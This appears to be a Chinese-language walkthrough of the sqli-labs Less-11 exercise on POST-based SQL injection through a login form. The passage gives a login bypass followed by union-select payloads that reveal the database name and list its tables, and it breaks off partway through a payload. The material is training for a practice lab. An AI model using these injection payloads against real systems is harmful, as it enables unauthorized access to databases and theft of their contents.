Less-11 POST - Error Based - Single quotes- String (基于错误的POST型单引号字符型注入)
从11题开始要新的篇章了,这里的注入方式改为了POST注入。
我们首先先应用前10题的一个解题思路来解决这道题,构建注入的语句。
用“”万能密码“来构造,
尝试登陆,发现能行
之后开始进行数据库的爆破:
Username:
' union select database(),6 --+
Password:
'
成功显示数据库的名字:
之后再按照前几题学会的爆破流程进行,可以看到所爆破出来的表名:
Username:
' union select (select group_concat(table_name) from information_schema.tables where table_schema=data